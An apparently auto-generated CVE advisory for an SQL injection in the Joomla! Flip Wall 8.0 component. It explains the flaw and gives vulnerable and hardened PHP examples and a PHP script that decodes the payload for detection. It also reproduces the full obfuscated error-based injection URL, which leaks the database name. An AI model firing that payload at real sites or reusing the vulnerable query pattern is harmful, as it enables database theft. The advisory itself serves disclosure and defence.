Joomla! Component Flip Wall 8.0 SQL Injection
Description
Joomla! Component Flip Wall 8.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the wallid parameter. Attackers can send GET requests to index.php with the option=com_flipwall&task=click&wallid parameter containing SQL injection payloads to extract sensitive database information.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
Patches
Vulnerability mechanics
Root cause
"Missing input sanitization on the wallid parameter allows SQL injection."
Attack vector
An unauthenticated attacker sends a GET request to `index.php` with `option=com_flipwall&task=click&wallid=[SQL]` [ref_id=1]. Because `wallid` is not sanitized, whatever follows the numeric value is appended to the component's SQL and executed by the database. The published payload obfuscates its keywords with MySQL version-conditional comments such as `/*!11166sELeCT*/` (MySQL discards the `/*!NNNNN ... */` wrapper and executes the enclosed text whenever the server version is at least NNNNN, and 11166, read as 1.11.66, is lower than any deployed version) and with mixed-case keywords, so naive case-sensitive keyword filters do not match. It then extracts data with a double-query error-based technique: a subquery that groups by a key built from `FLOOR(RAND(0)*2)` and the value to be exfiltrated, which makes MySQL raise a duplicate-key error whose message quotes that key, and with it the value.
Affected code
The vulnerability is in the `com_flipwall` component's handling of the `wallid` parameter: the `task=click` action passes the user-supplied value straight into a SQL query without sanitization, so arbitrary SQL can be appended to it. The advisory does not show the affected query itself.
What the fix does
The advisory does not include a published patch. To remediate, the component must validate the `wallid` parameter before it reaches the database, preferably by casting it to an integer (an ID has no legitimate non-numeric form) or by binding it through a prepared statement. Without a fix, the component remains vulnerable to arbitrary SQL execution.
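As an added illustration of the remediation described above (example code written for this page, not Flip Wall's own source, which the advisory does not include): the first function shows the vulnerable pattern the advisory describes, the second the hardened form. The table name `#__flipwall`, its columns and the function names are assumptions, and the code targets the Joomla! 3.8+ / 4 namespaced API.

```php
<?php
// Added example, not Flip Wall code. The table #__flipwall and the columns
// id, url and clicks are assumed for illustration only.
use Joomla\CMS\Factory;

// Vulnerable pattern, as the advisory describes it: the raw request value is
// spliced into the SQL string, so "811 AND (SELECT ...)" becomes part of the
// query and the database executes whatever the attacker appended.
function loadWallVulnerable()
{
    $db     = Factory::getDbo();
    $wallid = Factory::getApplication()->input->get('wallid', '', 'raw');

    $db->setQuery('SELECT * FROM #__flipwall WHERE id = ' . $wallid);

    return $db->loadObject();
}

// Hardened form: the value is reduced to an integer before it reaches SQL.
// getInt() applies Joomla's INT filter (non-numeric input becomes 0), the
// range check rejects 0 and negatives, and the (int) cast inside the query
// builder guarantees that only a number can end up in the WHERE clause.
function loadWallHardened()
{
    $db     = Factory::getDbo();
    $wallid = Factory::getApplication()->input->getInt('wallid', 0);

    if ($wallid <= 0) {
        throw new InvalidArgumentException('wallid must be a positive integer');
    }

    $query = $db->getQuery(true)
        ->select($db->quoteName(['id', 'url', 'clicks']))
        ->from($db->quoteName('#__flipwall'))
        ->where($db->quoteName('id') . ' = ' . (int) $wallid);

    $db->setQuery($query);

    return $db->loadObject();
}
```

On Joomla! 4 the same query can bind the value as a true prepared-statement parameter instead of casting it inline (`where('id = :id')` together with `bind(':id', $wallid, ParameterType::INTEGER)`); for an integer ID both routes are equivalent, and the cast has the advantage of also working on Joomla! 3 database drivers that lack binding.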
Preconditions
- config: The Joomla! Flip Wall component version 8.0 must be installed and accessible.
- auth: No authentication is required; the attack is performed over an HTTP GET request.
- network: The attacker must be able to reach the Joomla! instance over the network.
- input: The attacker supplies a malicious SQL payload in the `wallid` parameter.
Reproduction
Send a GET request to `http://localhost/[PATH]/index.php?option=com_flipwall&task=click&wallid=811+aND(/*!11166sELeCT*/+0x30783331+/*!11166FrOM*/+(/*!11166SeLeCT*/+cOUNT(*),/*!11166CoNCaT*/((sELEcT(sELECT+/*!11166CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1` [ref_id=1]. In the payload `811` stands for a wall ID, `0x7e` is the `~` separator, and the final hex literal is an ASCII marker string the exploit author appended so the leaked value is easy to spot. When database errors reach the page, MySQL answers with a `Duplicate entry ... for key 'group_key'` error whose quoted entry begins with the current database name followed by the marker, which both confirms the injection and leaks the database name. If errors are suppressed, compare the response for the trailing `AND 1=1` with one for `AND 1=2`: a difference shows that the injected condition is being evaluated.
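The following is an added example (not part of the advisory or the exploit) that shows what the obfuscated payload above reduces to once MySQL's version-conditional comments, mixed case and hex literals are normalised. It serves both as a reading aid for the reproduction step and as the normalisation a WAF rule or log-review script needs before it can match on keywords. The query string below is copied from the reproduction URL; the function names are this example's own.

```php
<?php
// Added example, not Flip Wall or Joomla! code. Normalises the obfuscated
// wallid payload so the SQL that MySQL would actually run becomes visible.

// Constructed input: the query string of the advisory's reproduction URL.
const REPRO_QUERY = 'option=com_flipwall&task=click&wallid=811+aND(/*!11166sELeCT*/+0x30783331+/*!11166FrOM*/+(/*!11166SeLeCT*/+cOUNT(*),/*!11166CoNCaT*/((sELEcT(sELECT+/*!11166CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1';

function wallidFromQuery($query)
{
    // parse_str splits each pair at its first '=' only, so the '=' inside the
    // payload stays in the value; '+' and %xx escapes are decoded as a server would.
    parse_str($query, $params);

    return isset($params['wallid']) ? (string) $params['wallid'] : '';
}

function normaliseSql($sql)
{
    // /*!NNNNN text */ is executed by MySQL when its version is >= NNNNN.
    // 11166 reads as 1.11.66, so the wrapper is dropped and the text kept.
    $sql = preg_replace('~/\*!\d{0,6}\s*(.*?)\*/~s', ' $1 ', $sql);

    // Any remaining ordinary comment is invisible to the server.
    $sql = preg_replace('~/\*.*?\*/~s', ' ', $sql);

    // Keywords and identifiers are case-insensitive in MySQL.
    $sql = strtolower($sql);

    // MySQL treats 0x... literals as strings; show them as quoted text.
    $sql = preg_replace_callback('~\b0x([0-9a-f]+)\b~', function ($m) {
        if (strlen($m[1]) % 2 !== 0) {
            return $m[0]; // odd digit count is not a valid literal; leave it
        }
        return "'" . addslashes(hex2bin($m[1])) . "'";
    }, $sql);

    return trim(preg_replace('~\s+~', ' ', $sql));
}

// Error-based "double query": GROUP BY on a key built from FLOOR(RAND(0)*2)
// makes MySQL raise a duplicate-key error that quotes the key, and the key
// carries the data the attacker wants to read.
function looksLikeDoubleQueryError($normalisedSql)
{
    return strpos($normalisedSql, 'floor(rand(0)*2)') !== false
        && strpos($normalisedSql, 'group by') !== false
        && strpos($normalisedSql, 'count(*)') !== false;
}

$sql = normaliseSql(wallidFromQuery(REPRO_QUERY));
echo $sql, PHP_EOL;
echo 'double-query error-based signature: ',
    looksLikeDoubleQueryError($sql) ? 'yes' : 'no', PHP_EOL;
```

Running the script prints the payload as plain lower-case SQL with `0x30783331` shown as `'0x31'`, `0x7e` as `'~'` and the final literal as the author's marker string, and reports the double-query signature as present. The same three-step normalisation (strip version comments, fold case, decode hex literals) is what a keyword-based filter must do first; the advisory's payload gets past filters precisely because they skip it.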
Generated on Jun 20, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- www.exploit-db.com/exploits/42524 (MITRE; exploit)
- www.vulncheck.com/advisories/joomla-component-flip-wall-sql-injection (MITRE; third-party advisory)
- pulseextensions.com (MITRE; product)
- extensions.joomla.org/extensions/extension/ads-a-affiliates/sponsors/flip-wall/ (MITRE; product)